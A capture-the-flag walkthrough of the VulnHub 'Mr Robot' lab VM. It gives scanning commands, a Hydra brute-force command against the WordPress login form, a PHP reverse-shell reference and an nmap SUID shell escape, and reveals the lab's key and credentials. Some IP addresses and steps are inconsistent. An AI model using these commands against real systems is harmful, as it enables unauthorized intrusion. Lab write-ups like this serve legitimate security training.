VulnHub: MrRobot Walkthrough

Author: 130n@calvinlai.com

Date: 06 Jan 2020

Background:

This box has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

https://www.vulnhub.com/entry/mr-robot-1,151/

Penetration Methodology:

Service Scanning

Enumeration

Exploitation

Getting Low Privilege Shell

Walkthrough:

Target machine: 192.168.187.133

Attacking (Hacker) machine: 192.168.187.134

Hacking Process Part 0 – Service Scanning

The target machine IP is 192.168.187.134. Get a basic understanding of the services available on the target machine by running an nmap aggressive scan against all ports.

0.1) Quick Pre-scan

nmap -p- 192.168.187.134

0.2) Detailed Analysis

nmap -p 22,80,443 -A -oN nmap-mrRobot.txt 192.168.187.134

Enumeration strategies

  1. Check the website for vulnerabilities
  2. Check for any hidden files/folders on the website
  3. Check the website

Hacking Process Part 1 – Enumeration

1.1) Strategy 1: Check Vulnerabilities

Nikto found no vulnerability that could be abused to bypass authentication.

1.2) Strategy 2: Check for any hidden files/folders on the website

python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://192.168.187.134/ -e php,txt -x 301,302,403,404 --simple-report=mrRobot.dirsearch

robots.txt is found, and it lists two files that should not be indexed: “fsocity.dic” and “key-1-of-3.txt”.

  1. View key-1-of-3.txt and get the first key: 073403c8a58a1f80d943455fb30724b9

  2. View the file fsocity.dic, which stores a set of candidate user account strings such as IDs and passwords. Download it and remove the duplicate records.

sort -u fsocity.dic > fsocity.uniq

1.3) Strategy 3: Check the website. According to the dirsearch result, visit the WordPress login page.

wpscan --url http://192.168.187.134 -e p --output wpscan-mrRobot.txt

As the forgot-password function returns a message indicating whether the username or email address is invalid, Hydra can be used to test the name list found above and find a valid user ID.

hydra -vV -L ./download/fsocity.uniq -p fkclai 192.168.187.134 http-post-form '/wp-login.php?action=lostpassword:user_login=^USER^&redirect_to=&wp-submit=Get+New+Password:Invalid username' > hydra-lostpwd-ac-mrRobot.txt

Got the username: elliot

Use the same wordlist again to find the password.

Login: elliot and password: ER28-0652 are found, and the WordPress admin page is logged into successfully.

Hacking Process Part 2 – Exploitation

2.1) Reverse Shell Exploitation

Using the PHP reverse shell from http://pentestmonkey.net/tools/php-reverse-shell

After several tries with different online hash-cracking websites, the hashed password turned out to be abcdefghijklmnopqrstuvwxyz

Hacking Process Part 3 – Getting Low Privilege Access

Exploiting a vulnerable SUID executable to get root access

3.1) Print the executables which have the SUID bit set

find / -user root -perm -4000 2>/dev/null

3.2) Confirm whether nmap has the SUID bit set.

3.3) Run nmap in interactive mode and use the “!sh” command to escape from the nmap prompt to a system shell.

Reference Link

A Guide To Linux Privilege Escalation

https://payatu.com/guide-linux-privilege-escalation